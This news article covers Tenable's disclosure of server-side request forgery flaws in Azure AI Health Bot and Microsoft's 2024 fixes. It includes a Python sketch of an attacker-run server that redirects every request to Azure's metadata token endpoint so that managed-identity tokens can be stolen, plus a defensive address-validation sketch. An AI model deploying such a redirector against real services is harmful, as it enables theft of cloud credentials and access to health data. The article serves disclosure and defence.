Microsoft has resolved several vulnerabilities in the Azure AI Health Bot service that could have allowed unauthorized access across different customer accounts. Discovered by Tenable Research, the flaws highlighted serious security weaknesses in AI-driven chatbot services.
Mechanism of Exploitation
The Azure AI Health Bot service, popular among healthcare providers for building virtual health assistants, contained flaws in its “Data Connections” feature, which lets customers integrate bots with external data sources. An attacker could point a data connection at a malicious external host under their control; by answering with redirects, that host could steer the service's requests toward internal Azure endpoints, including Azure's Instance Metadata Service (IMDS), bypassing built-in safeguards and exposing access tokens.
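To illustrate the redirect pattern described above, the sketch below stands up a minimal attacker-controlled endpoint that, instead of returning data, redirects every request to Azure's standard IMDS managed-identity token URL. The host, port, and class name are illustrative, and this is a simplified sketch of the general technique rather than a reproduction of Tenable's proof of concept.

```python
# Minimal sketch of the redirect-based request-forgery pattern described above.
# The handler name and listening address are illustrative only.
from http.server import BaseHTTPRequestHandler, HTTPServer

# Azure's Instance Metadata Service is reachable only from inside the host.
# This is the standard managed-identity token endpoint.
IMDS_TOKEN_URL = (
    "http://169.254.169.254/metadata/identity/oauth2/token"
    "?api-version=2018-02-01&resource=https://management.azure.com/"
)

class RedirectToIMDS(BaseHTTPRequestHandler):
    """Attacker-controlled 'data connection' endpoint: rather than serving
    data, it answers every GET with a 301 redirect toward the IMDS."""

    def do_GET(self):
        self.send_response(301)
        self.send_header("Location", IMDS_TOKEN_URL)
        self.end_headers()
        # Note: IMDS also expects a 'Metadata: true' request header on the
        # redirected request; see Tenable's advisories for the full details.

if __name__ == "__main__":
    # A backend that fetches this URL and blindly follows redirects would end
    # up calling the IMDS from inside Azure's network, and could hand the
    # resulting managed-identity access token back to the attacker.
    HTTPServer(("0.0.0.0", 8080), RedirectToIMDS).serve_forever()
```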
With the healthcare industry increasingly adopting AI tools, security lapses of this kind pose a significant threat given the sensitive nature of health data, and these vulnerabilities underscore the need for stringent security controls in AI-driven services. To address broader concerns, efforts such as the Advanced Research Projects Agency for Health's (ARPA-H) $50 million investment aim to strengthen healthcare cybersecurity through automation, and healthcare providers and device manufacturers are urged to collaborate more closely to safeguard medical data and devices.
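As an example of what such controls can look like in practice, one widely used safeguard against this class of server-side request forgery is to validate every outbound destination, including each redirect hop, against link-local, private, and loopback address ranges. The Python sketch below is a generic illustration of that check; it is not Microsoft's actual fix, and the function name is hypothetical.

```python
# Generic SSRF safeguard sketch (not Microsoft's fix): before fetching a
# customer-supplied URL, resolve it and refuse non-public destinations.
import ipaddress
import socket
from urllib.parse import urlparse

def is_allowed_target(url: str) -> bool:
    """Return True only if the URL resolves to public, routable addresses."""
    host = urlparse(url).hostname
    if host is None:
        return False
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return False
    for info in infos:
        addr = ipaddress.ip_address(info[4][0])
        # 169.254.0.0/16 (link-local) covers the IMDS at 169.254.169.254.
        if addr.is_link_local or addr.is_private or addr.is_loopback:
            return False
    return True

# A redirect-following client would repeat this check for every hop.
print(is_allowed_target("http://169.254.169.254/metadata/instance"))  # False
print(is_allowed_target("https://example.com/data"))                  # True
```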
Response and Fixes
Jimi Sebree, a senior engineer at Tenable, noted that the potential impact varied depending on the information customers exposed through the service. The flaws circumvented safeguards meant to prevent cross-tenant access, illustrating the security challenges that come with rapid AI development. Upon discovering the issues, Tenable notified Microsoft's Security Response Center (MSRC) on June 17, 2024. Microsoft promptly verified the report and rolled out fixes by July 2, 2024.
Following the initial fixes, Tenable identified another vulnerability affecting the service's FHIR (Fast Healthcare Interoperability Resources) endpoints, which Microsoft also addressed; unlike the first, this flaw did not permit cross-tenant access. To date, there is no evidence that either vulnerability was exploited by malicious actors. Detailed information is available in Tenable's research advisories TRA-2024-27 and TRA-2024-28.